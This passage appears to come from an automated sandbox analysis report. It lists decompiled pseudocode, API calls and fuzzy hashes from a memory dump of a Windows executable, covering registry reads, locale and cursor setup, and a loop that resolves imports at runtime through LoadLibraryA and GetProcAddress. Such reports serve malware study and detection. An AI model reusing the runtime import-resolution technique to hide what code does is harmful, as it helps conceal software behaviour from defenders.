_t96) != 0) { _push( *((intOrPtr*)(_t118 + 0x10))); _push(E00423BD0); _push(_v8); E00404AC0(); } E004239E4(_t118, _v8, _v16); } } else { *(_t118 + 0x18) = 0x20009; if(((_t70 & 0xffffff00 | *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) { _push( *((intOrPtr*)(_t118 + 0x10))); _push(E00423BD0); _push(_v8); E00404AC0(); } E004239E4(_t118, _v8, _v16); } } else { *(_t118 + 0x18) = 0x20019; if(((_t64 & 0xffffff00 | *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) { _push( *((intOrPtr*)(_t118 + 0x10))); _push(E00423BD0); _push(_v8); E00404AC0(); } E004239E4(_t118, _v8, _v16); } _pop(_t109); *[fs:eax] = _t109; _push(E00423BBD); return E0040473C( &_v8); } 0x00423a26 0x00423a2b 0x00423a2f 0x00423a30 0x00423a35 0x00423a38 0x00423a40 0x00423a4d 0x00423a51 0x00423a60 0x00423a60 0x00423a67 0x00423a78 0x00423a88 0x00423a8f 0x00423a97 0x00423ae3 0x00423af3 0x00423afa 0x00423b02 0x00423b48 0x00423b58 0x00423b5f 0x00423b67 0x00423b69 0x00423b79 0x00423b7b 0x00423b7e 0x00423b83 0x00423b8e 0x00423b8e 0x00423b9b 0x00423b9b 0x00423b04 0x00423b04 0x00423b14 0x00423b16 0x00423b19 0x00423b1e 0x00423b29 0x00423b29 0x00423b36 0x00423b36 0x00423a99 0x00423a99 0x00423aa9 0x00423aab 0x00423aae 0x00423ab3 0x00423abe 0x00423abe 0x00423acb 0x00423acb 0x00423ba2 0x00423ba5 0x00423ba8 0x00423bb5

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88 RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423AF3 RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 00423B58

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Open String ID: API String ID: 71445658-0 Opcode ID: fa64aabc8f2ba27a745f52475356cda600ad999c2f50812f57e3693a88520e87 Instruction ID: 1631747641735d97f0e726df34b4cb7d5d51ea82463f4736274f0810a2e96b2b Opcode Fuzzy Hash: fa64aabc8f2ba27a745f52475356cda600ad999c2f50812f57e3693a88520e87 Instruction Fuzzy Hash: 4E41B170B00218BBDB11DFA5E952B9EB7F9AB44304F5144BBB445B3282CB7DAF059B48

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%

E0045EBB0(intOrPtr __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) { intOrPtr _v8; char _v12; CHAR* _t24; struct HINSTANCE__* _t25; CHAR* _t28; intOrPtr _t33; intOrPtr* _t36; void* _t39; _t36 = __ecx; _v12 = __edx; _v8 = __eax; E00404BF0(_v8); E00404BF0(_v12); _push(_t39); _push(0x45ec57); _push( *[fs:eax]); *[fs:eax] = _t39 + 0xfffffff8; 0; _t28 = E00404C00(_v8); LoadLibraryA(_t28); // executed *0x4666a8 = GetModuleHandleA(_t28); if( *0x4666a8 != 0) { 0; 0; _t24 = E00404C00(_v12); _t25 = *0x4666a8; // 0x738c0000 *_t36 = GetProcAddress(_t25, _t24); } _pop(_t33); *[fs:eax] = _t33; _push(0x45ec5e); return E00404760( &_v12, 2); } 0x0045ebb8 0x0045ebba 0x0045ebbd 0x0045ebc3 0x0045ebcb 0x0045ebd2 0x0045ebd3 0x0045ebd8 0x0045ebdb 0x0045ebe4 0x0045ebf6 0x0045ebf9 0x0045ec06 0x0045ec12 0x0045ec1a 0x0045ec1e 0x0045ec29 0x0045ec2f 0x0045ec3a 0x0045ec3a 0x0045ec3e 0x0045ec41 0x0045ec44 0x0045ec56

APIs

LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9 GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01 GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleLibraryLoadModuleProc String ID: API String ID: 310444273-0 Opcode ID: 075936419fbc5cca61900586e8d69370c668ceb23336568181fa16149c6eeaa8 Instruction ID: d4a4c4ef2a58cf9094cbc387d8303d04bade7ed1a93cf8cbbf6f48fd4d8bd229 Opcode Fuzzy Hash: 075936419fbc5cca61900586e8d69370c668ceb23336568181fa16149c6eeaa8 Instruction Fuzzy Hash: 790140B0605244AFEB05EB76ED42A5A7BF8DB49314F12047AF504E32E2E678EE50C618

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0040CF98() { signed short _t13; int _t17; signed int _t21; signed int _t22; void* _t34; void* _t35; *0x4658c8 = 0x409; *0x004658CC = 9; *0x004658D0 = 1; _t13 = GetThreadLocale(); if(_t13 != 0) { *0x4658c8 = _t13; } if(_t13 != 0) { *0x004658CC = _t13 & 0x3ff; *0x004658D0 = (_t13 & 0x0000ffff) >> 0xa; } memcpy(0x461808, 0x40d03c, 8 << 2); _t34 = 0x4658c8; if( *0x4617c4 <= 4 || *0x4617c0 != 2) { *((char*)(_t34 + 0xd)) = GetSystemMetrics(0x4a) & 0xffffff00 | _t15 != 0x00000000; } else { *0x0040D049 = 1; } _t17 = GetSystemMetrics(0x2a); // executed _t22 = _t21 & 0xffffff00 | _t17 != 0x00000000; *(_t34 + 0xc) = _t22; if(_t22 != 0) { return E0040CF3C(_t35); } return _t17; } 0x0040cfa6 0x0040cfac 0x0040cfb3 0x0040cfba 0x0040cfc1 0x0040cfc3 0x0040cfc3 0x0040cfc8 0x0040cfd4 0x0040cfdd 0x0040cfdd 0x0040cff0 0x0040cff2 0x0040cffa 0x0040d017 0x0040d005 0x0040d005 0x0040d005 0x0040d01c 0x0040d023 0x0040d026 0x0040d02b 0x00000000 0x0040d033 0x0040d03a

APIs

GetThreadLocale.KERNEL32 ref: 0040CFBA GetSystemMetrics.USER32 ref: 0040D00D GetSystemMetrics.USER32 ref: 0040D01C

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$LocaleThread String ID: API String ID: 2159509485-0 Opcode ID: d31af3ae54a2743ab8082880c82d106a239316ea3c0ded5d8796c9a92dcae73e Instruction ID: 76d1b7ec664e111f503e51dd0c1979d9023841a60a1f3c9667e84ab395d3be29 Opcode Fuzzy Hash: d31af3ae54a2743ab8082880c82d106a239316ea3c0ded5d8796c9a92dcae73e Instruction Fuzzy Hash: F3018860A407518AD3205B6694013637AC8DB02319F08C03FE88DE73C2EB3DD846836A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00423CC2(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) { int _v8; char _v12; char _v16; void* __ebx; void* __edi; void* __esi; void* __ebp; long _t18; void* _t26; intOrPtr _t30; char _t38; _t35 = __ecx; _t38 = __edx; _t26 = __eax; _v8 = 0; _t18 = RegQueryValueExA( *(_t26 + 4), E00404C00(__edx), 0, &_v8, __ecx, &_a8); // executed if(_t18 != 0) { _v16 = _t38; _v12 = 0xb; _t30 = *0x462f48; // 0x4161b8 E0040C214(_t26, _t30, 1, _t35, _t38, 0, &_v16); E00404184(); } *_a4 = E004238F0(_v8); return _a8; } 0x00423ccd 0x00423ccf 0x00423cd1 0x00423cd5 0x00423cef 0x00423cf6 0x00423cf8 0x00423cfb 0x00423d05 0x00423d12 0x00423d17 0x00423d17 0x00423d2a 0x00423d34

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00423CEF

Strings

48B , xrefs: 00423D0D

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue String ID: 48B API String ID: 3660427363-1399719961 Opcode ID: 0794083d3378ee110cbc96ea9d2242b7670d2b8dc1216ac4c1635f1df70efc8f Instruction ID: dc9a7b025fb012292c3c1f78a1d553d82cca77016de03337154782b34ab35c11 Opcode Fuzzy Hash: 0794083d3378ee110cbc96ea9d2242b7670d2b8dc1216ac4c1635f1df70efc8f Instruction Fuzzy Hash: 55012175B00208BFD700EF99DC81A9AB7FCDB59314F10817AFD14DB281DA759E0487A5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00423CC4(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) { int _v8; char _v12; char _v16; void* __ebx; void* __edi; void* __esi; void* __ebp; long _t18; void* _t25; intOrPtr _t28; char _t33; _t32 = __ecx; _t33 = __edx; _t25 = __eax; _v8 = 0; _t18 = RegQueryValueExA( *(_t25 + 4), E00404C00(__edx), 0, &_v8, __ecx, &_a8); // executed if(_t18 != 0) { _v16 = _t33; _v12 = 0xb; _t28 = *0x462f48; // 0x4161b8 E0040C214(_t25, _t28, 1, _t32, _t33, 0, &_v16); E00404184(); } *_a4 = E004238F0(_v8); return _a8; } 0x00423ccd 0x00423ccf 0x00423cd1 0x00423cd5 0x00423cef 0x00423cf6 0x00423cf8 0x00423cfb 0x00423d05 0x00423d12 0x00423d17 0x00423d17 0x00423d2a 0x00423d34

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00423CEF

Strings

48B , xrefs: 00423D0D

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue String ID: 48B API String ID: 3660427363-1399719961 Opcode ID: 5053dc36f7366c11ef80729d79039a07f790926b80e060c94d0a9636341c036b Instruction ID: a8e3a137c339f5fd24472462273deb51e711ff11fc4394b496541acd54afbdef Opcode Fuzzy Hash: 5053dc36f7366c11ef80729d79039a07f790926b80e060c94d0a9636341c036b Instruction Fuzzy Hash: 45012175B00208BBD700EF99DC81A9AB7BCDB59314F10817AFD14DB281DA759E0487A5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 65%

E00423BD0(intOrPtr* __eax, signed int __ebx, char* __ecx, void* __edx, void* __fp0) { long _t16; intOrPtr* _t32; char* _t35; intOrPtr* _t37; _pop(_t37); *__eax = *__eax + __eax; *((intOrPtr*)(__ebx + 0x56)) = *((intOrPtr*)(__ebx + 0x56)) + __edx; _push(__ebx); _push(__ecx); _t35 = __ecx; _t32 = __eax; E00403264(__ecx, 8); _t16 = RegQueryValueExA( *(_t32 + 4), E00404C00(__edx), 0, _t37 + 8, 0, _t35 + 4); // executed *_t35 = E004238F0( *_t37); return __ebx & 0xffffff00 | _t16 == 0x00000000; } 0x00423bd0 0x00423bd1 0x00423bd3 0x00423bd4 0x00423bd8 0x00423bd9 0x00423bdd 0x00423be8 0x00423c06 0x00423c18 0x00423c22

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,00423C38), ref: 00423C06

Strings

MS Shell Dlg 2 , xrefs: 00423BD7

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue String ID: MS Shell Dlg 2 API String ID: 3660427363-3198668166 Opcode ID: 24aede73455477a306b869990c3da6da698364b98985e0eaff83912404be2809 Instruction ID: 7c8ec6a0d6e2363a4a3569427e10175affe607f8ccc4c0b7cc53773ec14cf429 Opcode Fuzzy Hash: 24aede73455477a306b869990c3da6da698364b98985e0eaff83912404be2809 Instruction Fuzzy Hash: FCF0826230D2446FD704EA6EAC41BAB7BDCDBC5310F05807FF948C7582DA24DD088369

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%

E00423BD4(void* __eax, char* __ecx, void* __edx, void* __fp0) { long _t14; signed int _t18; void* _t26; char* _t27; intOrPtr* _t28; _push(__ecx); _t27 = __ecx; _t26 = __eax; E00403264(__ecx, 8); _t14 = RegQueryValueExA( *(_t26 + 4), E00404C00(__edx), 0, _t28 + 8, 0, _t27 + 4); // executed *_t27 = E004238F0( *_t28); return _t18 & 0xffffff00 | _t14 == 0x00000000; } 0x00423bd8 0x00423bd9 0x00423bdd 0x00423be8 0x00423c06 0x00423c18 0x00423c22

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,00423C38), ref: 00423C06

Strings

MS Shell Dlg 2 , xrefs: 00423BD5, 00423BD7

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue String ID: MS Shell Dlg 2 API String ID: 3660427363-3198668166 Opcode ID: ae18820a77b22da24d61138b18a13f76920247e522b4d3da3e4fdaa58bf8c099 Instruction ID: 41461fa9fb353abdc0202eda5798ac71598ea82e96ed0a8436159ebd475baf22 Opcode Fuzzy Hash: ae18820a77b22da24d61138b18a13f76920247e522b4d3da3e4fdaa58bf8c099 Instruction Fuzzy Hash: 92F030723092046BE704EA6EAD41FABA7DCDBC9355F11803EF948D7281DA24DD088365

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%

E004605D0(void* __ecx, void* __edi, void* __esi) { intOrPtr _t6; intOrPtr _t8; intOrPtr _t10; intOrPtr _t12; intOrPtr _t14; void* _t16; void* _t17; intOrPtr _t20; intOrPtr _t21; intOrPtr _t22; intOrPtr _t23; intOrPtr _t28; _t25 = __esi; _t17 = __ecx; _push(_t28); _push(0x460656); _push( *[fs:eax]); *[fs:eax] = _t28; *0x4664fc = *0x4664fc - 1; if( *0x4664fc < 0) { *0x4664f8 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed _t31 = *0x4664f8; E004478D4(_t16, __edi, *0x4664f8); _t6 = *0x4362e8; // 0x436334 E0041A040(_t6, _t16, _t17, *0x4664f8); _t8 = *0x4362e8; // 0x436334 E0041A0E0(_t8, _t16, _t17, _t31); _t21 = *0x4362e8; // 0x436334 _t10 = *0x447f50; // 0x447f9c E0041A08C(_t10, _t16, _t21, __esi, _t31); _t22 = *0x4362e8; // 0x436334 _t12 = *0x44958c; // 0x4495d8 E0041A08C(_t12, _t16, _t22, __esi, _t31); _t23 = *0x4362e8; // 0x436334 _t14 = *0x4496b0; // 0x4496fc E0041A08C(_t14, _t16, _t23, _t25, _t31); } _pop(_t20); *[fs:eax] = _t20; _push(0x46065d); return 0; } 0x004605d0 0x004605d0 0x004605d5 0x004605d6 0x004605db 0x004605de 0x004605e1 0x004605e8 0x004605f8 0x004605f8 0x004605ff 0x00460604 0x00460609 0x0046060e 0x00460613 0x00460618 0x0046061e 0x00460623 0x00460628 0x0046062e 0x00460633 0x00460638 0x0046063e 0x00460643 0x00460643 0x0046064a 0x0046064d 0x00460650 0x00460655

APIs

GetVersion.KERNEL32(00000000,00460656), ref: 004605EA Part of subcall function 004478D4: GetCurrentProcessId.KERNEL32(?,00000000,00447A4C), ref: 004478F5 Part of subcall function 004478D4: GlobalAddAtomA.KERNEL32 ref: 00447928 Part of subcall function 004478D4: GetCurrentThreadId.KERNEL32 ref: 00447943 Part of subcall function 004478D4: GlobalAddAtomA.KERNEL32 ref: 00447979 Part of subcall function 004478D4: RegisterWindowMessageA.USER32(00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0044798F Part of subcall function 004478D4: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00447A13 Part of subcall function 004478D4: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00447A24

Strings

4cC , xrefs: 00460604, 0046060E, 00460618, 00460628, 00460638

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow String ID: 4cC API String ID: 3557136124-2099690512 Opcode ID: a912815bf11363b93ca19f7a7f60a486b9a53906b6aed234051300934d9d5803 Instruction ID: 025689f7684f9bed17e1c02e81f1f2566ccf6c41d45d360a3a3928fa787afd4c Opcode Fuzzy Hash: a912815bf11363b93ca19f7a7f60a486b9a53906b6aed234051300934d9d5803 Instruction Fuzzy Hash: C5F0FF39244241AFD311FF26EC5291B3BA4E789314353857BE84043675DA3DECA1DB9E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%

E0045ED90(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) { intOrPtr _v8; intOrPtr _v12; char _v16; intOrPtr _t16; intOrPtr _t17; intOrPtr _t20; CHAR* _t26; struct HINSTANCE__* _t27; intOrPtr _t28; struct HINSTANCE__* _t35; intOrPtr _t38; CHAR* _t50; void* _t51; intOrPtr _t53; void* _t60; _push(__ebx); _v16 = 0; _v8 = __eax; _push(_t60); _push(0x45eed7); _push( *[fs:eax]); *[fs:eax] = _t60 + 0xfffffff4; 0; *0x46666c = _v8; while(1) { _t16 = *0x46666c; // 0x22880f0 if( *((intOrPtr*)(_t16 + 0xc)) == 0) { break; } 0; 0; _t17 = *0x46666c; // 0x22880f0 _t4 = _t17 + 0xc; // 0x0 *0x46667c = *_t4 + *0x466630; _push(0x466680); _t20 = *0x46665c; // 0x0 _v12 = _t20; _push(E004058B4()); _t50 = *0x46667c; // 0x2288ccc E00404934( &_v16, _t50); _pop(_t51); if(E0045ECA0(0x466670, _t51) == 0) { 0; _t26 = *0x46667c; // 0x2288ccc _t27 = LoadLibraryA(_t26); // executed *0x466668 = _t27; } _t28 = *0x46666c; // 0x22880f0 if( *((intOrPtr*)(_t28 + 4)) != 0) { 0; 0; } else { 0; 0; 0; _t38 = *0x46666c; // 0x22880f0 _t10 = _t38 + 0x10; // 0x0 *0x466670 = *_t10 + *0x466630; } while( *((intOrPtr*)( *0x466670)) != 0) { *0x466674 = *((intOrPtr*)( *0x466670)) + *0x466630 + 2; _t35 = *0x466668; // 0x6f9f0000 *0x466678 = GetProcAddress(_t35, *0x466674); *((intOrPtr*)( *0x466670)) = *0x466678; *0x466670 = *0x466670 + 4; } *0x46666c = *0x46666c + 0x14; } _pop(_t53); *[fs:eax] = _t53; _push(0x45eede); return E0040473C( &_v16); } 0x0045ed96 0x0045ed9b 0x0045ed9e 0x0045edb2 0x0045edb3 0x0045edb8 0x0045edbb 0x0045edc4 0x0045edc8 0x0045eeb2 0x0045eeb2 0x0045eebb 0x00000000 0x00000000 0x0045edd8 0x0045eddc 0x0045edde 0x0045ede3 0x0045edec 0x0045edf1 0x0045edf6 0x0045edfb 0x0045ee03 0x0045ee07 0x0045ee0d 0x0045ee18 0x0045ee20 0x0045ee28 0x0045ee2b 0x0045ee31 0x0045ee36 0x0045ee36 0x0045ee3e 0x0045ee47 0x0045ee71 0x0045ee75 0x0045ee4f 0x0045ee4f 0x0045ee53 0x0045ee57 0x0045ee59 0x0045ee5e 0x0045ee67 0x0045ee67 0x0045eea4 0x0045ee89 0x0045ee8e 0x0045ee99 0x0045ee9f 0x0045eea1 0x0045eea1 0x0045eeab 0x0045eeab 0x0045eec3 0x0045eec6 0x0045eec9 0x0045eed6

APIs

LoadLibraryA.KERNEL32(02288CCC,00466680,00000000,0045EED7), ref: 0045EE31

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad String ID: API String ID: 1029625771-0 Opcode ID: 97d185083bbda5420dd8d0232ad7df22f33ba54b0d8fe9ee6b458a3115588826 Instruction ID: 41749767bb47e492ca36cbe40e98458e297fbfc91c6430a84583a06b372d5935 Opcode Fuzzy Hash: 97d185083bbda5420dd8d0232ad7df22f33ba54b0d8fe9ee6b458a3115588826 Instruction Fuzzy Hash: D8313AB0A01600EFCB04CF29F882E5677F4EB4A310B12857AE805D7361E379AD05CF5A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00454794(void* __eax) { struct HICON__* _t5; void* _t7; void* _t8; struct HINSTANCE__* _t11; CHAR** _t12; void* _t13; _t13 = __eax; *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00); _t8 = 0xffffffea; _t12 = 0x46275c; do { if(_t8 < 0xffffffef || _t8 > 0xfffffff4) { if(_t8 != 0xffffffeb) { _t11 = 0; } else { goto L4; } } else { L4: _t11 = *0x4657f8; // 0x400000 } _t5 = LoadCursorA(_t11, *_t12); // executed _t7 = E00454850(_t13, _t5, _t8); _t8 = _t8 + 1; _t12 = &(_t12[1]); } while (_t8 != 0xffffffff); return _t7; } 0x00454798 0x004547a6 0x004547a9 0x004547ae 0x004547b3 0x004547b6 0x004547c0 0x004547ca 0x00000000 0x00000000 0x00000000 0x004547c2 0x004547c2 0x004547c2 0x004547c2 0x004547d0 0x004547db 0x004547e0 0x004547e1 0x004547e4 0x004547ed

APIs

LoadCursorA.USER32 ref: 004547A1 LoadCursorA.USER32 ref: 004547D0

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorLoad String ID: API String ID: 3238433803-0 Opcode ID: b46ed10e13b5891911fbcf58363eb243a181175a176f5a66f7bf3ab0bf39d95a Instruction ID: 5b92fd6cb82509c6b3023340ad8d3fa0ece0f32d952ca65a9c1d4e2f0fe40f81 Opcode Fuzzy Hash: b46ed10e13b5891911fbcf58363eb243a181175a176f5a66f7bf3ab0bf39d95a Instruction Fuzzy Hash: E3F08921B046441A9A20557E5CC0A7A72D4DBC773AF20033BFD39DF3D2D72D6C86415A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00423988(void* __eax) { void* _t7; void* _t14; _t14 = __eax; _t7 = *(__eax + 4); if(_t7 != 0) { if( *((char*)(__eax + 0xc)) == 0) { RegFlushKey(_t7); } RegCloseKey( *(_t14 + 4)); // executed *(_t14 + 4) = 0; return E0040473C(_t14 + 0x10); } return _t7; } 0x00423989 0x0042398b 0x00423990 0x00423996 0x00423999 0x00423999 0x004239a2 0x004239a9 0x00000000 0x004239af 0x004239b5

APIs

RegFlushKey.ADVAPI32(00000000,?,004239F4,?,?,00000000,00423BA0,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 00423999 RegCloseKey.ADVAPI32(00000000,?,004239F4,?,?,00000000,00423BA0,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004239A2

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFlush String ID: API String ID: 320916635-0 Opcode ID: 956964d0e594b963543663876903ecf3408bc7f3908dee6d6cb4c89ebefcd960 Instruction ID: 607071273b8a8f03ded242f4628478f4e142bd0fa1bf7c60492dcbfc477769d6 Opcode Fuzzy Hash: 956964d0e594b963543663876903ecf3408bc7f3908dee6d6cb4c89ebefcd960 Instruction Fuzzy Hash: 7CD012A17002008BCF50EF7AC5C47177BDC5B06315B44C4B7A809EF247D67CC4508B24

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 63%

E00423A1A(void* __eax, void* __ebx, void* __edx, void* __esi) { char _v8; char _v9; void* _v16; char* _t61; signed int _t64; char* _t67; signed int _t70; char* _t73; signed int _t76; signed char _t96; intOrPtr _t109; void* _t118; void* _t121; _v8 = 0; _t118 = __eax; _push(_t121); _push(0x423bb6); _push( *[fs:eax]); *[fs:eax] = _t121 + 0xfffffff4; E004047D4( &_v8, __edx); _t96 = E004238DC(_v8); if(_t96 == 0) { E00404CA0( &_v8, 1, 1); } _v16 = 0; _t61 = E00404C00(_v8); _t64 = RegOpenKeyExA(E00423A08(_t118, _t96), _t61, 0, 0x20019, &_v16); // executed _v9 = _t64 == 0; if(_v9 == 0) { _t67 = E00404C00(_v8); _t70 = RegOpenKeyExA(E00423A08(_t118, _t96), _t67, 0, 0x20009, &_v16); _v9 = _t70 == 0; if(_v9 == 0) { _t73 = E00404C00(_v8); _t76 = RegOpenKeyExA(E00423A08(_t118, _t96), _t73, 0, 1, &_v16); _v9 = _t76 == 0; if(_v9 != 0) { *(_t118 + 0x18) = 1; if(((_t76 & 0xffffff00 | *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) { _push( *((intOrPtr*)(_t118 + 0x10))); _push(E00423BD0); _push(_v8); E00404AC0(); } E004239E4(_t118, _v8, _v16); } } else { *(_t118 + 0x18) = 0x20009; if(((_t70 & 0xffffff00 | *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) { _push( *((intOrPtr*)(_t118 + 0x10))); _push(E00423BD0); _push(_v8); E00404AC0(); } E004239E4(_t118, _v8, _v16); } } else { *(_t118 + 0x18) = 0x20019; if(((_t64 & 0xffffff00 | *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) { _push( *((intOrPtr*)(_t118 + 0x10))); _push(E00423BD0); _push(_v8); E00404AC0(); } E004239E4(_t118, _v8, _v16); } _pop(_t109); *[fs:eax] = _t109; _push(E00423BBD); return E0040473C( &_v8); } 0x00423a26 0x00423a2b 0x00423a2f 0x00423a30 0x00423a35 0x00423a38 0x00423a40 0x00423a4d 0x00423a51 0x00423a60 0x00423a60 0x00423a67 0x00423a78 0x00423a88 0x00423a8f 0x00423a97 0x00423ae3 0x00423af3 0x00423afa 0x00423b02 0x00423b48 0x00423b58 0x00423b5f 0x00423b67 0x00423b69 0x00423b79 0x00423b7b 0x00423b7e 0x00423b83 0x00423b8e 0x00423b8e 0x00423b9b 0x00423b9b 0x00423b04 0x00423b04 0x00423b14 0x00423b16 0x00423b19 0x00423b1e 0x00423b29 0x00423b29 0x00423b36 0x00423b36 0x00423a99 0x00423a99 0x00423aa9 0x00423aab 0x00423aae 0x00423ab3 0x00423abe 0x00423abe 0x00423acb 0x00423acb 0x00423ba2 0x00423ba5 0x00423ba8 0x00423bb5

APIs

